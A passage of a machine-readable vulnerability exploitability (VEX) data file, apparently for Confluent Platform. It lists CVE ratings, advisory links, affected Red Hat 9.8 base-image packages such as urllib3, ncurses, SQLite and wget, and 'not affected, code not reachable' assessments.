          "url": "https://avd.aquasec.com/nvd/cve-2023-45803"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2132"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2988"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-45803"
        },
        {
          "url": "https://bugzilla.redhat.com/2246840"
        },
        {
          "url": "https://bugzilla.redhat.com/2257028"
        },
        {
          "url": "https://bugzilla.redhat.com/2257854"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1983596"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1989575"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132867"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132868"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132872"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2228743"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2237773"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2237776"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2237777"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2237778"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2244340"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2246840"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253330"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254210"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262272"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25091"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33198"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34558"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2879"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2880"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41715"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29409"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39318"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39319"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39321"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39322"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39326"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45287"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45803"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23650"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-2132.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2024:2988"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/4e50fbc5db74e32cabd5ccc1ab81fc103adfe0b3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/4e98d57809dacab1cbe625fddeec1a290c478ea9"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/1.26.18"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/2.0.7"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-45803.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-2988.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00020.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6473-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6473-2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7762-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-45803"
        },
        {
          "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"
        }
      ],
      "published": "2023-10-17T20:15:10+00:00",
      "updated": "2026-06-17T06:29:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "21.3.1-2.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-50495",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "NCurse v6.4-20230418 was discovered to contain a segmentation fault via the component _nc_wrap_entry().",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-50495"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-50495"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LU4MYMKFEZQ5VSCVLRIZGDQOUW3T44GT/"
        },
        {
          "url": "https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00020.html"
        },
        {
          "url": "https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00029.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50495"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240119-0008/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6684-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-50495"
        }
      ],
      "published": "2023-12-12T15:15:07+00:00",
      "updated": "2026-06-17T06:39:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "6.2-12.20210508.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "6.2-12.20210508.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-0232",
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        416
      ],
      "description": "A heap use-after-free issue has been identified in SQLite in the jsonParseAddNodeArray() function in sqlite3.c. This flaw allows a local attacker to leverage a victim to pass specially crafted malicious input to the application, potentially causing a crash and leading to a denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-0232"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-0232"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2243754"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0232"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240315-0007/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-0232"
        }
      ],
      "published": "2024-01-16T14:15:48+00:00",
      "updated": "2026-06-17T06:53:02+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.34.1-10.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-10524",
      "ratings": [
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        918
      ],
      "description": "Applications that use Wget to access a remote resource using shorthand URLs and pass arbitrary user credentials in the URL are vulnerable. In these cases attackers can enter crafted credentials which will cause Wget to access an arbitrary host.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-10524"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/11/18/6"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-10524"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/wget.git/commit/?id=c419542d956a2607bbce5df64b9d378a8588d778"
        },
        {
          "url": "https://github.com/advisories/GHSA-mqrm-h2pw-9j9r"
        },
        {
          "url": "https://jfrog.com/blog/cve-2024-10524-wget-zero-day-vulnerability"
        },
        {
          "url": "https://jfrog.com/blog/cve-2024-10524-wget-zero-day-vulnerability/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10524"
        },
        {
          "url": "https://seclists.org/oss-sec/2024/q4/107"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250321-0007"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250321-0007/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-10524"
        }
      ],
      "published": "2024-11-19T15:15:06+00:00",
      "updated": "2026-06-17T06:55:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-8.el9_4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-11053",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
